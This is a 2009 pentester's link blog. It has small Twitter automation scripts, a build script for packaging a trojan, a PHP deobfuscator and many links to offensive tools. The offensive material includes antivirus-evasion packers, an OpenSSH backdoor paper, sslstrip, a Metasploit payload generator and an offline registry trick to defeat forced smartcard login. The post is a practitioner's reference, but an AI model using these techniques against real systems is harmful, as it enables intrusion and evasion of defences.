Sunday, October 4, 2009

Moving Home

With my move to SquareSpace, I've decided to move Mubix Links over there as well.

You can find it now at: http://www.room362.com/mubixlinks/

Please update your feeds to: http://www.room362.com/mubixlinks/rss.xml or start using the FeedBurner address: http://feeds.feedburner.com/MubixsLinks

For those of you using the feedburner address, you shouldn't have to change a thing.

Sorry for the hassle, just trying to consolidate and slim down ;-)

Tuesday, September 22, 2009

Monday, September 21, 2009

Script to unblock people on Twitter – Ruby

I created this script because I couldn’t really find anything out there for it. Both the Twitter support page and all the Twitter APIs out there had the ability to unblock people, but only if you knew who you wanted to unblock. Recently I tried the Twitter Karma service, which can mass unfollow / block people (hence my last couple of scripts). I clicked the wrong button one time and it blocked a whole bunch of people. But say you’re not a klutz like me; maybe you just forgot who you’ve blocked over time.

This script will dump the list of people you block and unblock them all. You could expand this to get the name of each individual you block, but that’s an API call for each one. Let me know if there is a better way; right now, the only way to figure out who was unblocked is through the 302 response generated with each request, which redirects you to the page of the user you just unblocked. (Push this script through a proxy to see it.)


#!/usr/bin/env ruby

require 'net/http'
require 'rexml/document'
include REXML

# Set use_proxy to true to route everything through a local intercepting
# proxy (handy for watching the 302 redirects that name each unblocked user)
use_proxy  = false
proxy_srvr = "127.0.0.1"
proxy_port = "8080"
proxy_user = ""
proxy_pass = ""

# Your Twitter credentials
twitter_user = "joeuser"
twitter_pass = "password1"

# The authenticity_token and the __utma cookie must be copied from a
# logged-in browser session; they are left blank here on purpose
header = {
  'User-Agent'       => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  'X-Requested-With' => "XMLHttpRequest",
  'Cookie'           => "__utma="
}

data = "authenticity_token=&twttr=true"

# Step 1: fetch the list of blocked user IDs over the API (basic auth)
doc = nil
if use_proxy
  Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') { |http|
    req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
    req.basic_auth twitter_user, twitter_pass
    response = http.request(req)
    doc = Document.new response.body
  }
else
  Net::HTTP.start('twitter.com') { |http|
    req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
    req.basic_auth twitter_user, twitter_pass
    response = http.request(req)
    doc = Document.new response.body
  }
end

# Step 2: POST to /blocks/destroy/<id> for every ID in that list
doc.elements.each('//id') { |f|
  if use_proxy
    Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') { |http|
      req2 = '/blocks/destroy/' + f.text
      response2 = http.post(req2, data, header)
      puts response2.code
    }
  else
    Net::HTTP.start('twitter.com') { |http|
      req2 = '/blocks/destroy/' + f.text
      response2 = http.post(req2, data, header)
      puts response2.code
    }
  end

  puts "Unblocking: " + f.text
}

Script to unfollow people on twitter - Python

This is exactly like the last script with a few minor changes. First, the last script only has the ability to force people to unfollow you if you aren’t following them. Second, the API call and the request URL are different: GetFollowers instead of GetFriends, and friendships/remove instead of friendships/destroy. Don’t forget to fill in the same 4 fields that were missing/wrong in the last one.


#!/usr/bin/python

import twitter   # python-twitter
import urllib2

# Fill in the __utma cookie from a logged-in browser session
headers = {
    'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    'Cookie'     : "__utma=",
}

# Fill in the authenticity_token from the same session
data = "authenticity_token=&twttr=true"

# Your Twitter credentials
api = twitter.Api(username='joeuser', password='password1')

# Page through the follower list and POST friendships/remove for every ID
for b in range(1, 100):
    users = api.GetFollowers(page=b)
    for i in users:
        request = "http://twitter.com/friendships/remove/" + str(i.id)
        req = urllib2.Request(request, data, headers)
        post = urllib2.urlopen(req)
        print post

Script to force people to unfollow you on twitter - Python

I left the authenticity token and Cookie partially filled out so you know what to look for in your request. Basically you fill out those two variables, plus your user / pass of course, and it will go through 100 pages of your followers, which should peg out your API calls. You’ll have to wait another hour to keep going, but you could easily put this in a loop until you get down to 0. The output could use a bit of cleaning up. You’ll need python-twitter, but BT4 and Ubuntu at least have it in their repos for easy install.


#!/usr/bin/python

import twitter   # python-twitter
import urllib2

# Fill in the __utma cookie from a logged-in browser session
headers = {
    'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    'Cookie'     : "__utma=",
}

# Fill in the authenticity_token from the same session
data = "authenticity_token=&twttr=true"

# Your Twitter credentials
api = twitter.Api(username='joeuser', password='password1')

# Page through the list and POST friendships/destroy for every ID; 100 pages
# is enough to exhaust the hourly API limit
for b in range(1, 100):
    users = api.GetFriends(page=b)
    for i in users:
        request = "http://twitter.com/friendships/destroy/" + str(i.id)
        req = urllib2.Request(request, data, headers)
        post = urllib2.urlopen(req)
        print post

Saturday, September 19, 2009

Security is Simplicity: Comment by Akibako

This was posted as a comment to my blog before I took it down, and the information in it I didn't want to go to waste. So I've reposted it here:
akibako <nobody@nowhere.com> (unregistered) wrote:

I wholeheartedly agree with your main point. That said -- and I hate to be the one to split hairs -- I would argue that your Japanese citations are inaccurate.

Japanese people have and use credit cards all the time. According to the Bank for International Settlements, the number of Japanese credit card holders is roughly equal to that of Germany, and even exceeds Canada. It *is* true, however, that Japan does not have 'check cards', but this is simply because Japan does not have checks. The vast majority of cards in Japan work the system of automatically deducting the *entire* balance of the credit card once every month.

Getting a credit card is just as easy as in the States. I got my first Japanese credit card after filling out a half-page form which took less than 5 minutes. No major form of identification was necessary. I get offers for "pre-approved" credit cards in my mail box every month.

Japanese people bank online constantly. Earlier this year, #2-seated cell phone carrier AU launched a partnership with Tokyo Mitsubishi UFJ Bank to access all of your banking functions over your cell phone, including balance transfers. It's been hugely popular, and other carriers have followed suit. The most profitable bank in Japan in 2004 was Shinsei Bank, which differentiates itself by essentially running an online-banking-only presence. Visiting a branch requires you to interface with your account using a PC, not a bank clerk.

Japanese people buy stuff online constantly. Last year, online sales figures per capita in Japan were only slightly below that of America.

In such a disaster-prone country as Japan, it would be short-sighted to assume that the Japanese government doesn't keep easily-backup-able electronic versions of important documents. My family registry, proof of residency, and marriage certificate are all given to me via a laser-printed document (made official by a number of stamps).

Stamps (hanko, inkan) are just as easy to copy -- if not more so -- as written signatures. Life is made infinitely more difficult for the average person as one usually has a number of these stamps in slight variations in design. They are the antithesis of simplicity. There are no records provided telling you which stamp was used for a given document. I've had documents rejected for not having the "correct" inkan, only to have the company later apologize for incorrect verification. The illusion of security is amplified by the perception among people that hanko/inkan are un-forgeable (password analogy, anyone?). It is common practice for a business to accept a document from someone other than the document holder simply because it has the correct hanko. There have been numerous news stories of wives emptying their husband's bank accounts and fleeing the country.

The amount of data I push over my lines every month would *easily* be classified as "excessive use" (many times over). While it might be detected by the ISP, disconnections due to it are unheard of.

I agree with, and appreciate, the crux of your argument completely, but do not think that these specific examples from Japanese society are strong fodder.

Thursday, September 17, 2009

Download without touching a site

Blocked from a specific download? On a pentest and don’t want your IP seen pulling a file? Doing malware analysis and don’t want to directly get a file? Here’s the solution:

http://filecanny.com/

I’m sure you’ll figure out how to use it that best fits your needs.

Getting 3D video working on Dell Mini 10

Really hard to find (for me at least):

http://credentiality2.blogspot.com/2009/08/accelerated-video-on-dell-mini-10-with.html

This is THE way to get it working right.

FastStone Capture

This tool has spoiled me for any other screen capture tool. I can’t live without it. (The following link is to the freeware version.)
http://www.portablefreeware.com/?id=775

It went to trialware after 5.3; you can download version 6.5 at:
http://www.faststone.org/FSCaptureDetail.htm

It’s only 19.95 and adds a lot of features including a Screen Recorder.

Both versions are completely portable.

.htaccess tricks

16 cool .htaccess uses that help you get a better grip on its use:
http://www.thomsonchemmanoor.com/16-useful-htaccess-tricks-and-hacks-for-web-developers.html

Pentest Console

This was talked about at Security BSides ( by @jcran ), and the video is on the site, but it boils down to a collaboration tool that is super fitted for pentesting.

http://www.pentestconsole.com/

Monday, September 7, 2009

Offline Microsoft Updates

I’m surprised I haven’t added this to my links before:

CTUpdate 6.0 - http://www.h-online.com/security/Offline-Update--/features/112953

The USB stick option in 6.0 is sweet (which you could kinda already do if you knew what directory to copy)

Adding this to a hacked U3 device so that it silently installs Windows / Office updates makes for a really quick update process.

Saturday, August 29, 2009

@cktricky’s DirSnatch

This is one of those tools that doesn’t quite cross your mind until you see its power. DirSnatch is a one-stop executable that you can give to a customer of a web app sec test; they run it, and you get back a perfectly formatted text file of all their directories and files for your testing needs.

http://cktricky.blogspot.com/2009/08/source-code-of-dirsnatch.html

Saturday, August 22, 2009

Microsoft Word Auto-Close Prank

This little stunt remaps the 'e' key to close Word without saving:
http://www.iambetterthanu.com/2007/11/22/microsoft-word-prank/

I wonder what other evil remapping can be done ;-)

Friday, August 21, 2009

Convert VirtualBox VMs to VMware VMs

So I found this and thought it an awesome one liner:
Source: http://ubuntuforums.org/showthread.php?t=772419

How to convert VBox machine to VMware

I figured it out!! YAY!!

"sudo qemu-img convert /home/emil/.VirtualBox/VDI/WindowsXP.vdi /home/emil/Desktop/XP.vmdk"

I'm not sure if it needs to be executed with "sudo" but that worked for me. Now I can switch to Vmware Virtual Machine from Virtual Box.

Stream your screen via VLC

I’ve seen this before, and I think I’ve done this before, but it’s still awesome and I’m thinking about its use for doing training. Nothing says you can’t do it over the net. Haven’t tried.. yet:

http://www.nerdlogger.com/2008/01/stream-your-linuxwindowsmac-desktop-as.html

Thursday, August 13, 2009

Decoding eval(gzinflate(base64_decode(

Trying to fix it so that my site didn’t say it was sponsored by “Car Dealers” I ran across an eval(gzinflate(base64_decode( encoded message. Google came up with this 2006 post:

http://danilo.ariadoss.com/decoding-eval-gzinflate-base64-decode/

But that didn’t work for me for some reason, but the online one I found later worked like a charm:

http://www.tareeinternet.com/scripts/decrypt.php
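As an added example (not code from this post or from either linked decoder), the following Python peels eval(gzinflate(base64_decode('...'))) wrappers offline, layer by layer, without ever executing the PHP, and goes slightly beyond the post by handling several nested layers, which is how injected snippets are usually stacked. It assumes the wrapper is exactly that three-call chain (PHP's gzinflate is raw DEFLATE, so zlib with wbits=-15 undoes it) and uses its own constructed sample rather than the injected code from the post.

```python
import base64
import re
import zlib

# One layer of the wrapper: eval(gzinflate(base64_decode('<base64>'))) with
# optional whitespace, either quote style and an optional trailing semicolon.
LAYER_RE = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)\s*\)\s*;?"""
)


def gzinflate(data):
    """PHP's gzinflate() is raw DEFLATE with no zlib/gzip header, hence wbits=-15."""
    return zlib.decompress(data, -15)


def peel_layer(php):
    """Return the source hidden inside the outermost wrapper, or None when there
    is no wrapper or the blob does not decode cleanly (bad charset, truncated,
    not actually deflate data)."""
    match = LAYER_RE.search(php)
    if match is None:
        return None
    blob = re.sub(r"\s+", "", match.group(1))  # obfuscators often line-wrap the base64
    try:
        return gzinflate(base64.b64decode(blob)).decode("utf-8", errors="replace")
    except (zlib.error, ValueError):
        return None


def unwrap(php, max_layers=20):
    """Peel wrappers repeatedly and return (final_source, layers_peeled).
    The PHP is only decoded, never run, so this is safe on a suspect file."""
    layers = 0
    while layers < max_layers:
        inner = peel_layer(php)
        if inner is None:
            break
        php = inner
        layers += 1
    return php, layers


# --- Constructed sample (hypothetical, not the injected code from the post) ---
def wrap(php):
    """Build one wrapper layer the way the obfuscators do: raw deflate, then base64."""
    compressor = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = compressor.compress(php.encode("utf-8")) + compressor.flush()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(raw).decode("ascii")


SAMPLE_INNER = "echo 'Sponsored by Car Dealers';"
SAMPLE = wrap(wrap(SAMPLE_INNER))  # two nested layers

if __name__ == "__main__":
    source, depth = unwrap(SAMPLE)
    print("peeled %d layer(s):" % depth)
    print(source)
```

Feed it the contents of a suspect .php file and review the peeled output by eye; a result of 0 layers means the file uses some other obfuscator, not that it is clean.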

Monday, August 3, 2009

RFID Security - Free ID Cards Anyone?

This is definitely not my normal link. But it's something that I am going to print off and shove in a couple of people's faces to read. Don't discount it because of its title, as I almost did. Please read it. (Hence my title's vagueness; I didn't want the same thing to happen.)

http://www.wired.com/threatlevel/2009/08/fed-rfid/

Blackhat US 2009 (Vegas) Archives

Some videos are already posted!
http://blackhat.com/html/bh-usa-09/bh-usa-09-archives.html

UDP Tunneling over SSH

http://zarb.org/~gc/html/udp-in-ssh-tunneling.html

Credit:
Singe tweeted: How to tunnel UDP through SSH, http://is.gd/20fja The socat example worked like a charm for me. A quick hack for when OpenVPN is overkill.

Friday, July 31, 2009

Programming from the Ground Up

RT @windexh8er: Was looking for a good assembly book. Ran across free! Friday FTW. http://tr.im/uV73
(Long Version: http://savannah.inetbridge.net/pgubook/)

I have only had a chance to jump through it quickly, but the examples look easy to read and have a bunch of explanation surrounding them. Definitely in my 'to read' pile.

Then @craigbalding countered with: @mubix @windex8er cool...but don't forget the original ASM freebie: http://webster.cs.ucr.edu/AoA/index.html (The Art of Assembly)

This should be enough assembly to fill quite a few weekends.

Thursday, July 23, 2009

Ncrack – Think Hydra integrated into Nmap

and made better ;-)

http://sock-raw.org/nmap-ncrack/ncrack_draft.html

Salted Password Cracker / MetaScanner

Kalgecin has two great tools over at his Google code page.

Crack.pl - md5/sha1cracker, works with dictionaries as well as rainbowtables. Or so it says. I haven’t tested yet.

MetaScanner – Kinda like db_autopwn but a lot more customizable.

http://code.google.com/p/kalgecin/downloads/list

Internet by all means

S├ębastien Raveau posted a great article back in June about all the different ways of getting internet access when that access is restricted. I tweeted about it and talked about it but never put it here, and I always have a hard time re-finding his site (this is my only bookmarking)

http://blog.sebastien.raveau.name/2009/06/internet-by-all-means.html

Definitely check it out if you haven’t already.

Usenet Resource Downloader

Yes.. people still use Usenet. And this is a great way of accessing those pirated movies in-depth technical discussions.

http://urdland.com/

Source: http://www.ghacks.net/2009/07/23/a-web-interface-for-newsgroups-downloads/

Wednesday, July 22, 2009

InGuardians Tools List

Some of my favorites: SSH_Decoder, Middler, and ServifyThis

http://www.inguardians.com/tools/

WardriveSQL

A database driven wardriving / wep cracking machine.

Original post: http://www.phonelosers.com/index.php?topic=4209.0

“New Site”: http://wardrivesql.info/

Bindshell’s Tools List

Makers of BeEF (Browser Exploitation Framework) have a bunch of other great tools:

http://www.bindshell.net/tools

Echo Mirage is one I have a lot of fun with. And Dnetj is a REALLY useful setup if you can get it going on some beefy boxes.

Metacab

http://www.phx2600.org/archive/2008/08/29/metacab/

Metacab is a cabinet file that contains Netcat, Nmap, VNC and other remote administration utilities that need only a Windows command shell, cmd.exe, to install and use. Install and uninstall scripts are included, and work is being completed on antivirus evasion.

CeWL – Custom Wordlist Generator

By @digininja

http://www.digininja.org/cewl.php

By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behavior can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.

Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.

Backdooring OpenSSH by Ithilgore

http://sock-raw.org/netsec/sshbackdoor

Reverse Code Engineering Tool Library

The “Collaborative RCE Tool Library” is an awesome list of tools used for RE, but as with all tools, they can be used in a ton of different ways.

http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools

Core Security Free Tools

http://www.coresecurity.com/content/open-source-projects

Monday, July 20, 2009

Structure of Microsoft PE Files

This is almost as bad as reading the IA32 Assembly manuals, but it’s a must read and it’s really not that long.

Everything you ever wanted to know about PE files:

http://msdn.microsoft.com/en-us/magazine/ms809762.aspx

Thanks cpwp from the Offensive Security forums for the link

Computer Hardware Cheat-Sheet Poster

It costs ($49) to get printed, but you can print it yourself. A great reference for anyone that has ever built a computer.

http://sonic840.deviantart.com/art/Computer-hardware-poster-1-7-111402099

Saturday, July 18, 2009

Polypack – What packer is your friend?

This site checks your binaries against AV, packed and unpacked, then tells you which packer, if any, would best help you avoid AV. But remember, this means you are uploading your binary to a host that you don’t know.

http://polypack.eecs.umich.edu/w00tpc/

Ncat – Nmap’s new Netcat

Ncat adds many capabilities not found in Hobbit's original nc, including SSL support, proxy connections, IPv6, and connection brokering. The original nc contained a simple port scanner, but we omitted that from Ncat because we have a preferred tool for that function

http://nmap.org/ncat/guide/index.html

In-depth Windows Registry

Tim from the PenTest mailing list posted the following references that really delve deep into the Windows hive:

The Windows registry hive format is described here:
http://sentinelchicken.com/research/registry_format/

Also, some of Brendan Dolan-Gavitt's tools and blog posts (http://moyix.blogspot.com/) may be helpful in figuring out what's what in SAM hives.

Bypassing Software Restriction Policies

http://hype-free.blogspot.com/2009/07/bypassing-srp-from-powershell.html

Beating Linux ASLR

http://jbrownsec.blogspot.com/2009/07/beating-linux-aslr.html

Friday, July 17, 2009

Buffer Overflow examples

“Insecure Programming by Example” http://community.corest.com/~gera/InsecureProgramming/

These are great tutorials that you can compile and find your zero-days in. (Oh, then send them to a friend, use ServifyThis to make it a service, and have your very own vuln.)

Offsec LM Cracker

http://cracker.offensive-security.com/index.php

Wednesday, July 8, 2009

BRAWNDO

They currently have a “Summer Special” for 22.00 a case.

http://www.reduxdirect.com

Sunday, July 5, 2009

Paimei – Reverse Engineering Framework

http://code.google.com/p/paimei/

Script Your Documentation Instantly

A great project that allows documentation of network assets locally and over the network ;-) (SYDI). It does a lot that the Meterpreter script ‘winenum’ does, and a whole lot more. Most of it really doesn’t help you as an attacker, but it did spark a lot of good ideas, and sometimes you might not have the power of meterpreter at your beck & call.

http://sydiproject.com/

sslstrip

Can’t believe I never posted this, it’s Moxie’s sslstrip tool from BH DC 2009. Does some amazing things to help MITM ssl sessions.

http://thoughtcrime.org/software/sslstrip/index.html

WMI interfacing Python Script (nix)

http://dev.zenoss.org/svn/trunk/wmi/

Thanks to Joe McCray of http://www.learnsecurityonline.com/ for the link!

Thursday, July 2, 2009

Validation

If you haven’t seen this video yet, it’s well worth the 16 minutes of your life (yes it is a bit corny):

Handwritten fonts – Presenters this is for you!

One of Garr Reynolds from Presentation Zen’s staples when creating a presentation is to use a unique font. Here is an amazing resource for handwritten fonts, which look GREAT on presentations:

http://www.hongkiat.com/blog/40-free-high-quality-hand-drawn-fonts/

Wednesday, June 24, 2009

PickAXE – Pragmatic Ruby

http://whytheluckystiff.net/ruby/pickaxe/

An awesome online resource for learning Ruby

Windows Heap Overflows using Process Environment Block (PEB)

After a bunch of googling to find out what PEB was I happened upon this old milw0rm paper, which answered that question and the one I was going to ask next: How is it used in exploitation:

http://milw0rm.org/papers/66

LordPE eat your heart out

Explorer Suite is awesome, here is their description:

A freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64. Special fields description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker etc. First PE editor with support for .NET internal structures. Resource Editor (Windows Vista icons supported) capable of handling .NET manifest resources. The suite is available for x86, x64 and Itanium.

http://ntcore.com/exsuite.php

System Call Ordinals for XP SP2 x64

http://indefinitestudies.org/2009/01/22/digging-up-system-calls-ordinals-on-xp-x64/

I apologize for not remembering who tweeted this to thank them. But thanks to Daniel Reynaud for posting it.

Tuesday, June 23, 2009

Nessus SCTP scanning

Stolen from: http://blog.tenablesecurity.com/2009/05/scanning-monitoring-for-sctp.html

Paul goes into a lot of meat and potatoes about SCTP but the juice is here:

To scan for SCTP on your network and check if you are vulnerable using Nessus:

Enable “IP Protocols Scan” under the “Misc” plug-in family, and check “Thorough tests(slow)” in the Advanced tab of the scan policy under “Global Variable Settings”.

Monday, June 22, 2009

Dan Guido’s Videos

At the current time of posting, there are 10 videos that, as a security professional, you NEED to watch. It’s free training from some of the best in the biz. Bookmark it.

http://www.vimeo.com/dguido

Fiddler and Watcher

Fiddler is a web debugger, and watcher is a plug-in that adds security testing options to Fiddler.

http://www.fiddler2.com/fiddler2/

Watcher (Fiddler plug-in): http://websecuritytool.codeplex.com/

HTTP over SMTP proxy

http://sectechno.wordpress.com/2009/06/10/http-over-smtp-proxy/

Thursday, June 18, 2009

“Compile” python to a single executable

Here is a script David Kennedy (ReL1K) sent me a while back when we wrote a trojan for the Cyber Collegiate Defense Competition:

Just download py2exe, python setup.py install, then you have py2exe installed....

Say you have a file moo.py you want to compile, just take the code below and put it in a file called compile.py or something, modify it to change 'moo.py' to whatever py you want to compile and run python compile.py build py2exe and you're all done. Super simple.


from distutils.core import setup
import py2exe, sys, os
# Hot Sex
# Pretend "py2exe" was given on the command line, so the script can be
# run without extra arguments
sys.argv.append('py2exe')

setup(
    # bundle_files=1 packs the interpreter and all dependencies into the .exe
    options = {'py2exe': {'bundle_files': 1}},
    # Change 'moo.py' to the script you want to compile
    console= [{'script': "moo.py"}],
    # No separate library.zip next to the executable
    zipfile = None,
)

Pastebin has evolved.

Etherpad is a pastebin like site where you can edit on the fly… and so can a dozen other people. They actually do a REALLY good job at monitoring changes from everyone. There is also a chat feature, that way you aren’t notepad chatting, and an IMPORT functionality. Importing is great when your clipboard buffer just might not be good enough:

http://etherpad.com/

.. just wow.. (Google check them out, they nailed something you are STILL having problems with, but of course, you are still in BETA)

Wednesday, June 17, 2009

Web App Sec Testing Firefox Extension Collection

A really good list of extensions. The best way to do this is keep multiple copies of Portable Firefox with the addons. I would suggest naming the directories for each copy of Firefox accordingly and also editing their configuration to allow simultaneous starting and altering the title bar so that you can differentiate between the multiple instances.

https://addons.mozilla.org/en-US/firefox/collection/webappsec

Tuesday, June 16, 2009

Phenoelit

Tired of hitting the main site, and making the jump..

http://www.phenoelit-us.org/index.html

Windows functions to open a socket/connection

I hope to be using these links to use as part of .. you know what… I forgot, but I know it will come back to me and I’ll need these links, so I am storing them here. Muhahahah..

http://msdn.microsoft.com/en-us/library/ms738545(VS.85).aspx

http://www.ntkernel.com/w&p.php?id=7

CORE Security IE Zone Bypass MS09-019

CORE’s write-up + code: http://www.coresecurity.com/content/ie-security-zone-bypass

MS09-019 advisory: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

5 Security Holes at the Office (Video)

CSO interviewed Chris Nickerson and he showed a reporter 5 security problems a random office building had before he ever entered the building:

http://www.csoonline.com/article/494464/Social_Engineering_Security_Holes_at_the_Office_Includes_Video_

Wednesday, June 10, 2009

Pluses and Minuses of forced SmartCard login

Registry Key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption

Off Setting: DWORD=0
On Setting: DWORD=1

This option can make Kon-boot, OFFLINE NT PASSWORD RESET and some of HIREN’s PASSWORD tools pretty useless. But wait.. Can’t you edit the registry offline? Yup! (Be sure to pull the plug because “Computer” policies are applied BEFORE the logon prompt appears)

Tuesday, June 9, 2009

Monday, June 8, 2009

ARPFreeze: Protection against ARP spoofing – Iron Geek style

So IronGeek puts out tons of videos and some pretty sweet tools. This one is no less awesome:

http://www.irongeek.com/i.php?page=security/arpfreeze-static-arp-poisoning


Technitium MAC Address Changer

So, yes, it can change your MAC address on your Windows box, but it does A LOT more. Definitely something to pull around with you on a USB stick.

http://www.technitium.com/tmac/index.html

WEPBuster – Perl Autohacking

A perl script that automates the whole process of WEP cracking.

http://code.google.com/p/wepbuster/

GNS3 Network Simulator

http://www.gns3.net/

Probably the best way of getting hands on a Cisco without buying one off of eBay. Tons of features and probably the only sim I’ve worked with that has the complete feature set of the actual devices. (Probably because you have to supply it with a real IOS file)

Sunday, June 7, 2009

Crypto for Pentesters

Chris Eng does a good job at explaining what you need to know:

http://video.google.com/videoplay?docid=-5187022592682372937

ISO Standards translated to “Plain English”

I don’t work with ISO standards, but definitely worth keeping the link

http://www.praxiom.com/

And on twitter: http://twitter.com/praxiom

Metasploit online payload generator

Just for those who didn’t know it was there:

http://metasploit.com:55555/PAYLOADS

New version of iKAT

iKat is a “Kiosk Attack Tool”; the page is certainly NSFW:

http://ikat2.ha.cked.net

Thursday, June 4, 2009

10 Questions you don’t want to ask in interviews

http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2009/04/19/JOBSryan.DTL

  1. "What does your company do?"
  2. "Are you going to do a background check?"
  3. "When will I be eligible for a raise?"
  4. "Do you have any other jobs available?"
  5. "How soon can I transfer to another position?"
  6. "Can you tell me about bus lines to your facility?"
  7. "Do you have smoking breaks?"
  8. "Is [my medical condition] covered under your insurance?"
  9. "Do you do a drug test?"
  10. "If you hire me, can I wait until [more than three weeks from now] to start the job?"

Sandcat – Advanced Web App Sec Tester

There are tons of scanners/testers on the market, but this one’s feature set kinda caught my eye:

http://pentestit.com/2009/06/04/sandcat-advanced-web-application-security-tester/

As of now, the SandCat will scan for these fault injections:
* Buffer Overflow
* Cookie Manipulation
* Command Execution
* CRLF Injection
* Cross Frame Scripting
* Cross-Site Scripting (XSS)
* Default Account
* Directory Listing
* Directory Traversal
* File Inclusion
* Information Disclosure
* LDAP Injection
* MX Injection
* Password Disclosure
* Path Disclosure
* PHP Code Injection
* Server-Specific Vulnerabilities: IIS / iPlanet / Others
* Source Code Disclosure
* SQL Injection
* XPath Injection
* Miscellaneous

Friday, May 29, 2009

What is a Rootkit? You sure?

A very well written article on some of the history and details of what a “rootkit” is:

http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly


“Underground Hacking” Links

Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:

http://hackxcrack.es/

http://www.darkc0de.com/index.shtml

http://www.playhack.net/

http://trythis0ne.com/?page=toolz

http://avhackers.com/index.php

https://www.ihteam.net/#

http://www.w4ck3d.org/forums/

http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)

http://hackforums.net

================================

Un.Aware eZine ( http://www.awarenetwork.org/etc/)

Uninformed eZine ( http://uninformed.org/? )

Phrack eZine ( http://phrack.org/ )

Phrack issue #64 by TCOLH - “A brief history of the Underground scene” ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )

Tuesday, May 26, 2009

Force Windows Update Script

Stolen from: http://msmvps.com/blogs/athif/pages/66375.aspx

Copy and Paste the code below into a text file and name it AUForceUpdate.cmd


=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client:
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists)
Echo 3. Deletes the DetectionStartTime registry key (if it exists)
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv)
Echo 6. Force the detection
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================

tail -f, I must leave you for another

Stolen from: http://www.shell-fu.org/lister.php?id=820


tail -f /var/log/messages


This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.

Another option is:

less +F /var/log/messages

The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.

Durzosploit - Javascript Exploit Generator

Takes script('XSS Working'); to the next level:
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

Thursday, May 21, 2009

A Cheat, A Method and a Book

So I wanted to get these down before they scrolled by in twitter:

Nick Harbour's Reverse Engineering Cheat Sheet:

http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf


Lenny Zeltser's Reverse Engineering Cheat Sheet:

http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html


And the Unix Toolbox. DO NOT underestimate the power of this booklet:

http://cb.vu/unixtoolbox.xhtml


Tuesday, May 19, 2009

Defcon CTF and Qualifiers: Past Challenges and Answers

Even if you have never competed, and are not signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.
http://nopsr.us/

100 Free Online Courses (MIT and such)

Tarantula - A fuzzing spider

The only homepage I could find: http://github.com/relevance/tarantula

Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc


Haven't tried it yet, plan to.

Handwriting Analysis book on Scribd

If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:

Handwriting Analysis & Success Secrets by Bart A Baggett

http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett

Dranzer - ActiveX Fuzzer

http://www.cert.org/vuls/discovery/dranzer.html

Here is what they say about it:

Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.

We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.

OfficeCat: Look for Exploits in MS Office Documents

Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.

Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html

Friday, May 15, 2009

